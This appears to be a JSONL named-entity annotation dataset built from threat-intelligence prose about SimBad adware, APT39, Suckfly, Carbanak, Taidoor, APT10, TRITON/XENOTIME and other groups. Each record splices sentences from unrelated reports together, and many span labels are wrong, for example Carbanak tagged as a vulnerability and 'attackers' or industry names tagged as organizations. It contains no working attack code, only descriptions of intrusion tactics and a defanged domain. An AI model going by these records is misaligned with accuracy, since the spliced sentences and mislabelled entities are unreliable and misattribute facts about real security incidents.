{"text": "] com \u2019 as an ad-related SDK . APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats . It has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 127, "end": 133, "label": "Organization"}, {"start": 134, "end": 141, "label": "Organization"}]}
{"text": "We believe the developers were scammed to use this malicious SDK , unaware of its content , leading to the fact that this campaign was not targeting a specific county or developed by the same developer . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns . Similar to its other attacks , Suckfly used the Nidiran back door along with a number of hacktools to infect the victim 's internal hosts .", "spans": [{"start": 204, "end": 209, "label": "Organization"}, {"start": 226, "end": 266, "label": "Organization"}, {"start": 353, "end": 373, "label": "Organization"}, {"start": 642, "end": 659, "label": "Malware"}, {"start": 683, "end": 692, "label": "Malware"}]}
{"text": "The malware has been dubbed \u2018 SimBad \u2019 due to the fact that a large portion of the infected applications are simulator games . Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from telecommunications firms . In 2015 , Suckfly conducted a multistage attack .", "spans": [{"start": 30, "end": 36, "label": "Malware"}, {"start": 167, "end": 172, "label": "Organization"}, {"start": 325, "end": 349, "label": "Organization"}]}
{"text": "The Infection Chain Once the user downloads and installs one of the infected applications , \u2018 SimBad \u2019 registers itself to the \u2018 BOOT_COMPLETE \u2019 and \u2018 USER_PRESENT \u2019 intents , which lets \u2018 SimBad \u2019 to perform actions after the device has finished booting and while the user is using his device respectively . BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts . Suckfly conducted a multistage attack between April 22 and May 4 .", "spans": [{"start": 94, "end": 100, "label": "Malware"}, {"start": 189, "end": 195, "label": "Malware"}, {"start": 309, "end": 322, "label": "Organization"}, {"start": 359, "end": 367, "label": "System"}, {"start": 372, "end": 375, "label": "System"}]}
{"text": "After installation , the malware connects to the designated Command and Control ( C & C ) server , and receives a command to perform . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . On April 22 , 2015 , Suckfly exploited a vulnerability on the targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack .", "spans": [{"start": 135, "end": 143, "label": "Vulnerability"}, {"start": 186, "end": 193, "label": "System"}, {"start": 211, "end": 220, "label": "Organization"}, {"start": 314, "end": 321, "label": "Organization"}, {"start": 395, "end": 402, "label": "System"}, {"start": 483, "end": 500, "label": "Malware"}]}
{"text": "\u2018 SimBad \u2019 comes with a respected list of capabilities on the user \u2019 s device , such as removing the icon from the launcher , thus making it harder for the user to uninstall , start to display background ads and open a browser with a given URL . In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts . Suckfly conducted a multistage attack against an e-commerce organization .", "spans": [{"start": 2, "end": 8, "label": "Malware"}, {"start": 266, "end": 275, "label": "Organization"}, {"start": 297, "end": 344, "label": "System"}, {"start": 347, "end": 352, "label": "System"}, {"start": 450, "end": 473, "label": "Organization"}]}
{"text": "What Does SimBad Do ? If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . Suckfly conducted a multistage attack against an e-commerce organization based in India .", "spans": [{"start": 10, "end": 16, "label": "Malware"}, {"start": 54, "end": 62, "label": "Vulnerability"}, {"start": 231, "end": 244, "label": "Vulnerability"}, {"start": 329, "end": 352, "label": "Organization"}]}
{"text": "\u2018 SimBad \u2019 has capabilities that can be divided into three groups \u2013 Show Ads , Phishing , and Exposure to other applications . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Most of the group 's attacks are focused on government or technology related companies and organizations .", "spans": [{"start": 2, "end": 8, "label": "Malware"}, {"start": 184, "end": 207, "label": "System"}, {"start": 210, "end": 213, "label": "System"}, {"start": 218, "end": 226, "label": "Vulnerability"}, {"start": 321, "end": 331, "label": "Organization"}, {"start": 335, "end": 363, "label": "Organization"}]}
{"text": "With the capability to open a given URL in a browser , the actor behind \u2018 SimBad \u2019 can generate phishing pages for multiple platforms and open them in a browser , thus performing spear-phishing attacks on the user . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens . While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector .", "spans": [{"start": 74, "end": 80, "label": "Malware"}, {"start": 428, "end": 441, "label": "Organization"}, {"start": 452, "end": 458, "label": "Organization"}, {"start": 463, "end": 474, "label": "Organization"}, {"start": 512, "end": 526, "label": "Malware"}]}
{"text": "With the capability to open market applications , such as Google Play and 9Apps , with a specific keyword search or even a single application \u2019 s page , the actor can gain exposure for other threat actors and increase his profits . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort . While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday .", "spans": [{"start": 58, "end": 69, "label": "System"}, {"start": 74, "end": 79, "label": "System"}, {"start": 342, "end": 359, "label": "Organization"}, {"start": 487, "end": 496, "label": "Malware"}]}
{"text": "The actor can even take his malicious activities to the next level by installing a remote application from a designated server , thus allowing him to install new malware once it is required . Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy .", "spans": [{"start": 192, "end": 201, "label": "Organization"}]}
{"text": "The C & C server observed in this campaign is \u2018 www [ . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction .", "spans": [{"start": 48, "end": 55, "label": "Indicator"}, {"start": 131, "end": 139, "label": "Vulnerability"}, {"start": 144, "end": 163, "label": "Organization"}, {"start": 265, "end": 287, "label": "Organization"}, {"start": 385, "end": 409, "label": "Organization"}, {"start": 436, "end": 460, "label": "Organization"}]}
{"text": "] addroider.com \u2019 . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks . There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks .", "spans": [{"start": 57, "end": 66, "label": "Organization"}, {"start": 155, "end": 160, "label": "Organization"}, {"start": 236, "end": 260, "label": "Organization"}]}
{"text": "This server runs an instance of \u2018 Parse Server \u2019 ( source on GitHub ) , an open source version of the Parse Backend infrastructure , which is a model for providing web app and mobile app developers with a way to link their applications to backend cloud storage and APIs exposed by back-end applications , while also providing features such as user management , push notifications and more . Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage . During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations .", "spans": [{"start": 61, "end": 67, "label": "Organization"}, {"start": 401, "end": 409, "label": "System"}, {"start": 478, "end": 487, "label": "Organization"}, {"start": 582, "end": 596, "label": "Organization"}, {"start": 679, "end": 688, "label": "Organization"}, {"start": 741, "end": 765, "label": "Organization"}]}
{"text": "The domain \u2018 addroider [ . The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money . We believe that Suckfly will continue to target organizations in India and similar organizations in other countries in order to provide economic insight to the organization behind Suckfly 's operations .", "spans": [{"start": 13, "end": 26, "label": "Indicator"}, {"start": 31, "end": 44, "label": "Organization"}, {"start": 299, "end": 307, "label": "Organization"}]}
{"text": "] com \u2019 was registered via GoDaddy , and uses privacy protection service . Just last week Lazarus were found stealing millions from ATMs across Asia and Africa . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 90, "end": 97, "label": "Organization"}, {"start": 228, "end": 234, "label": "System"}, {"start": 242, "end": 267, "label": "Indicator"}, {"start": 300, "end": 313, "label": "Vulnerability"}, {"start": 328, "end": 340, "label": "Malware"}, {"start": 372, "end": 398, "label": "Malware"}, {"start": 401, "end": 404, "label": "Malware"}]}
{"text": "While accessing the domain from a browser you get a login page very similar to other malware panels . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more . Proofpoint is tracking this attacker , believed to operate out of China , as TA459 .", "spans": [{"start": 116, "end": 123, "label": "Organization"}, {"start": 218, "end": 229, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 318, "end": 328, "label": "Organization"}, {"start": 395, "end": 400, "label": "Organization"}]}
{"text": "The \u2018 Register \u2019 and \u2018 Sign Up \u2019 links are broken and \u2018 redirects \u2019 the user back to the login page . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 102, "end": 110, "label": "System"}, {"start": 193, "end": 217, "label": "Organization"}, {"start": 286, "end": 309, "label": "Organization"}, {"start": 382, "end": 388, "label": "System"}, {"start": 396, "end": 421, "label": "Indicator"}, {"start": 454, "end": 467, "label": "Vulnerability"}, {"start": 482, "end": 494, "label": "Malware"}, {"start": 526, "end": 552, "label": "Malware"}, {"start": 555, "end": 558, "label": "Malware"}]}
{"text": "According to RiskIQ \u2019 s PassiveTotal , the domain expired 7 months ago . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems . TA549 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT .", "spans": [{"start": 13, "end": 19, "label": "System"}, {"start": 77, "end": 86, "label": "Organization"}, {"start": 128, "end": 137, "label": "Organization"}, {"start": 227, "end": 232, "label": "Organization"}, {"start": 279, "end": 284, "label": "Malware"}, {"start": 287, "end": 298, "label": "Malware"}, {"start": 305, "end": 310, "label": "Malware"}]}
{"text": "As a result , it may be that are looking into a compromised , parked domain that was initially used legitimately , but is now participating in malicious activities . Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system . TA459 is well-known for targeting organizations in Russia and neighboring countries .", "spans": [{"start": 201, "end": 210, "label": "Organization"}, {"start": 326, "end": 335, "label": "System"}, {"start": 409, "end": 414, "label": "Organization"}]}
{"text": "With the capabilities of showing out-of-scope ads , exposing the user to other applications , and opening a URL in a browser , \u2018 SimBad \u2019 acts now as an Adware , but already has the infrastructure to evolve into a much larger threat . While the group has not yet demonstrated an ICS capability , RASPITE 's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the way for later potential ICS events . Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular LOCs of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day .", "spans": [{"start": 129, "end": 135, "label": "Malware"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 279, "end": 282, "label": "System"}, {"start": 296, "end": 303, "label": "Organization"}, {"start": 430, "end": 432, "label": "Organization"}, {"start": 480, "end": 483, "label": "System"}, {"start": 534, "end": 539, "label": "Organization"}]}
{"text": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 . Using data collected from the Trend Micro\u2122 Smart Protection Network , we are able to identify victims whose networks communicated with Taidoor C&C servers .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 155, "end": 160, "label": "Organization"}, {"start": 169, "end": 174, "label": "Organization"}, {"start": 207, "end": 244, "label": "Organization"}, {"start": 312, "end": 331, "label": "Malware"}]}
{"text": "APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia . The Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan . Taidoor spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues .", "spans": [{"start": 22, "end": 32, "label": "Organization"}, {"start": 46, "end": 52, "label": "Organization"}, {"start": 216, "end": 226, "label": "Organization"}, {"start": 227, "end": 232, "label": "System"}, {"start": 275, "end": 281, "label": "System"}]}
{"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . Despite some exceptions , the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 74, "end": 99, "label": "Malware"}, {"start": 210, "end": 212, "label": "Malware"}, {"start": 226, "end": 229, "label": "System"}, {"start": 242, "end": 247, "label": "System"}, {"start": 290, "end": 296, "label": "System"}]}
{"text": "APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host . One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 35, "end": 50, "label": "System"}, {"start": 183, "end": 193, "label": "Organization"}]}
{"text": "They then proceeded to log directly into the VPN using the credentials of the compromised user . Suckfly targeted one of India 's largest e-commerce companies , a major Indian shipping company , one of India 's largest financial organizations , and an IT firm that provides support for India 's largest stock exchange .", "spans": [{"start": 59, "end": 94, "label": "System"}, {"start": 138, "end": 158, "label": "Organization"}, {"start": 176, "end": 192, "label": "Organization"}, {"start": 219, "end": 242, "label": "Organization"}, {"start": 252, "end": 259, "label": "Organization"}]}
{"text": "Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": [{"start": 13, "end": 18, "label": "Organization"}, {"start": 68, "end": 88, "label": "Organization"}, {"start": 281, "end": 294, "label": "Indicator"}, {"start": 304, "end": 311, "label": "Vulnerability"}, {"start": 314, "end": 323, "label": "Organization"}, {"start": 324, "end": 339, "label": "System"}, {"start": 340, "end": 353, "label": "Vulnerability"}, {"start": 356, "end": 369, "label": "Vulnerability"}]}
{"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . Taidoor actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 30, "end": 42, "label": "Organization"}, {"start": 189, "end": 193, "label": "System"}, {"start": 202, "end": 209, "label": "System"}]}
{"text": "Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 . The attackers actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": [{"start": 212, "end": 225, "label": "Organization"}, {"start": 236, "end": 243, "label": "Organization"}, {"start": 248, "end": 260, "label": "Organization"}]}
{"text": "To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's . As part of their social engineering ploy , the Taidoor attackers attach a decoy document to their emails that , when opened , displays the contents of a legitimate document but executes a malicious payload in the background .", "spans": [{"start": 20, "end": 26, "label": "Organization"}, {"start": 29, "end": 41, "label": "Organization"}, {"start": 57, "end": 71, "label": "Organization"}, {"start": 83, "end": 93, "label": "Organization"}, {"start": 157, "end": 167, "label": "System"}, {"start": 170, "end": 181, "label": "System"}, {"start": 230, "end": 238, "label": "Organization"}, {"start": 249, "end": 261, "label": "Organization"}, {"start": 284, "end": 302, "label": "Organization"}, {"start": 365, "end": 371, "label": "System"}]}
{"text": "They move laterally and escalate system privileges to extract sensitive information \u2014 whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult . Sometimes , however , certain samples made use of domain names for HTTP communication .", "spans": [{"start": 99, "end": 107, "label": "Organization"}, {"start": 141, "end": 145, "label": "System"}, {"start": 344, "end": 348, "label": "Indicator"}]}
{"text": "In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system . Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible .", "spans": [{"start": 55, "end": 59, "label": "System"}, {"start": 62, "end": 71, "label": "Organization"}, {"start": 81, "end": 84, "label": "System"}, {"start": 99, "end": 116, "label": "Organization"}, {"start": 216, "end": 223, "label": "Malware"}, {"start": 224, "end": 231, "label": "Malware"}]}
{"text": "Attackers can point and click their way through a compromised network and exfiltrate data . The ultimate objective of targeted attacks is to acquire sensitive data .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]}
{"text": "The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally . In December 2017 , FireEye publicly released our first analysis on the TRITON attack where malicious actors used the TRITON custom attack framework to manipulate industrial safety systems at a critical infrastructure facility and inadvertently caused a process shutdown .", "spans": [{"start": 74, "end": 102, "label": "Organization"}, {"start": 105, "end": 109, "label": "Organization"}, {"start": 123, "end": 128, "label": "Organization"}, {"start": 217, "end": 221, "label": "Organization"}, {"start": 270, "end": 277, "label": "Organization"}, {"start": 368, "end": 374, "label": "Malware"}]}
{"text": "PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection . In our most recent analysis , we attributed the intrusion activity that led to the deployment of TRITON to a Russian government-owned technical research institute in Moscow .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 11, "end": 22, "label": "Organization"}, {"start": 55, "end": 60, "label": "Organization"}, {"start": 78, "end": 90, "label": "Organization"}, {"start": 107, "end": 116, "label": "Organization"}, {"start": 256, "end": 262, "label": "Malware"}]}
{"text": "APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world . For more in-depth analysis of TRITON and other cyber threats , consider subscribing to FireEye Cyber Threat Intelligence .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 104, "end": 116, "label": "System"}, {"start": 138, "end": 147, "label": "Organization"}, {"start": 228, "end": 234, "label": "Malware"}, {"start": 285, "end": 318, "label": "Organization"}]}
{"text": "This , in turn , would provide access to a larger amount of intellectual property and sensitive data . During this time , the attacker must ensure continued access to the target environment or risk losing years of effort and potentially expensive custom ICS malware .", "spans": [{"start": 254, "end": 257, "label": "Malware"}, {"start": 258, "end": 265, "label": "Malware"}]}
{"text": "APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences . In this report we continue our research of the actor 's operations with a specific focus on a selection of custom information technology ( IT ) tools and tactics the threat actor leveraged during the early stages of the targeted attack lifecycle .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 75, "end": 79, "label": "Organization"}, {"start": 235, "end": 257, "label": "Organization"}, {"start": 260, "end": 262, "label": "Organization"}]}
{"text": "In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B . Additionally , the actor possibly gained a foothold on other target networks\u2014beyond the two intrusions discussed in this post \u2013 using similar strategies .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 100, "end": 108, "label": "System"}, {"start": 112, "end": 118, "label": "System"}, {"start": 137, "end": 161, "label": "System"}]}
{"text": "For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators . There is often a singular focus from the security community on ICS malware largely due to its novel nature and the fact that there are very few examples found in the wild .", "spans": [{"start": 99, "end": 111, "label": "Organization"}, {"start": 383, "end": 401, "label": "Organization"}, {"start": 405, "end": 408, "label": "Malware"}, {"start": 409, "end": 416, "label": "Malware"}]}
{"text": "Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources . In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute .", "spans": [{"start": 21, "end": 32, "label": "Organization"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 248, "end": 258, "label": "Organization"}, {"start": 294, "end": 300, "label": "Malware"}]}
{"text": "By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates .", "spans": [{"start": 13, "end": 22, "label": "Organization"}, {"start": 27, "end": 40, "label": "Organization"}, {"start": 74, "end": 82, "label": "Organization"}, {"start": 132, "end": 140, "label": "Organization"}]}
{"text": "It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering . TEMP.Veles' lateral movement activities used a publicly-available PowerShell-based tool , WMImplant .", "spans": [{"start": 20, "end": 28, "label": "Organization"}, {"start": 35, "end": 49, "label": "Organization"}, {"start": 56, "end": 67, "label": "Organization"}, {"start": 78, "end": 83, "label": "Organization"}, {"start": 148, "end": 159, "label": "Organization"}, {"start": 214, "end": 235, "label": "Malware"}, {"start": 238, "end": 247, "label": "Malware"}]}
{"text": "DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering . On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 55, "end": 63, "label": "Organization"}, {"start": 72, "end": 86, "label": "Organization"}, {"start": 95, "end": 110, "label": "Organization"}, {"start": 205, "end": 215, "label": "Organization"}]}
{"text": "FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors . Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 10, "end": 28, "label": "Organization"}, {"start": 79, "end": 89, "label": "Organization"}, {"start": 92, "end": 100, "label": "Organization"}, {"start": 105, "end": 122, "label": "Organization"}, {"start": 153, "end": 163, "label": "Organization"}, {"start": 195, "end": 203, "label": "Organization"}]}
{"text": "Seedworm likely functions as a cyber espionage group to secure actionable intelligence that could benefit their sponsor 's interests . We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target 's network .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 31, "end": 52, "label": "Organization"}, {"start": 193, "end": 203, "label": "Organization"}]}
{"text": "After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals . Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity .", "spans": [{"start": 54, "end": 62, "label": "System"}, {"start": 66, "end": 75, "label": "System"}, {"start": 78, "end": 86, "label": "Organization"}, {"start": 335, "end": 345, "label": "Organization"}, {"start": 428, "end": 434, "label": "Organization"}, {"start": 447, "end": 468, "label": "Organization"}, {"start": 502, "end": 512, "label": "Organization"}]}
{"text": "It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data exfiltration from high-profile victim organizations . XENOTIME is easily the most dangerous threat activity publicly known .", "spans": [{"start": 56, "end": 65, "label": "Organization"}, {"start": 73, "end": 87, "label": "System"}, {"start": 236, "end": 244, "label": "Organization"}]}
{"text": "In addition to stealing keystrokes , Naikon also intercepted network traffic . CNIIHM 's characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity .", "spans": [{"start": 37, "end": 43, "label": "Organization"}, {"start": 79, "end": 85, "label": "Organization"}, {"start": 181, "end": 191, "label": "Organization"}]}
{"text": "Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals . Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks .", "spans": [{"start": 67, "end": 76, "label": "Organization"}, {"start": 81, "end": 89, "label": "Organization"}, {"start": 116, "end": 131, "label": "Organization"}, {"start": 165, "end": 185, "label": "Organization"}, {"start": 188, "end": 194, "label": "Organization"}, {"start": 229, "end": 258, "label": "Malware"}, {"start": 295, "end": 303, "label": "Organization"}, {"start": 414, "end": 426, "label": "Malware"}]}
{"text": "PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data exfiltration . XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric 's Triconex safety instrumented system .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 115, "end": 123, "label": "Organization"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 176, "end": 183, "label": "Organization"}, {"start": 213, "end": 219, "label": "Malware"}]}
{"text": "Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . Targeting a safety system indicates significant damage and loss of human life were either intentional or acceptable goals of the attack , a consequence not seen in previous disruptive attacks such as the 2016 CRASHOVERRIDE malware that caused a power loss in Ukraine .", "spans": [{"start": 12, "end": 21, "label": "Organization"}, {"start": 44, "end": 53, "label": "Organization"}, {"start": 93, "end": 108, "label": "Organization"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 203, "end": 212, "label": "Organization"}, {"start": 506, "end": 519, "label": "Malware"}, {"start": 520, "end": 527, "label": "Malware"}]}
{"text": "Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts .", "spans": [{"start": 12, "end": 27, "label": "Organization"}, {"start": 86, "end": 94, "label": "Organization"}, {"start": 107, "end": 117, "label": "Organization"}, {"start": 122, "end": 131, "label": "Organization"}, {"start": 216, "end": 224, "label": "Organization"}, {"start": 230, "end": 259, "label": "Malware"}, {"start": 287, "end": 294, "label": "System"}, {"start": 342, "end": 348, "label": "Malware"}]}
{"text": "The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods . Dragos' data indicates XENOTIME remains active .", "spans": [{"start": 24, "end": 37, "label": "System"}, {"start": 257, "end": 264, "label": "Organization"}, {"start": 280, "end": 288, "label": "Organization"}]}
{"text": "In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates . TEMP.Veles created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly .", "spans": [{"start": 16, "end": 24, "label": "Organization"}, {"start": 190, "end": 200, "label": "Organization"}, {"start": 211, "end": 217, "label": "Malware"}, {"start": 218, "end": 225, "label": "Malware"}, {"start": 240, "end": 277, "label": "Malware"}]}
{"text": "During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations . Furthermore , Dragos' analysis of the TRISIS event continues as we recover additional data surrounding the incident .", "spans": [{"start": 80, "end": 89, "label": "Organization"}, {"start": 142, "end": 166, "label": "Organization"}, {"start": 183, "end": 190, "label": "Organization"}, {"start": 207, "end": 213, "label": "Malware"}]}
{"text": "The ultimate objective of targeted attacks is to acquire sensitive data . XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target .", "spans": [{"start": 74, "end": 82, "label": "Organization"}]}
{"text": "Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information . Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex .", "spans": [{"start": 26, "end": 33, "label": "Organization"}, {"start": 71, "end": 75, "label": "System"}]}
{"text": "Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . Dragos instead focuses on threat behaviors and appropriate detection and response .", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 56, "end": 63, "label": "Organization"}, {"start": 165, "end": 187, "label": "Organization"}, {"start": 193, "end": 204, "label": "Organization"}, {"start": 216, "end": 222, "label": "Organization"}]}
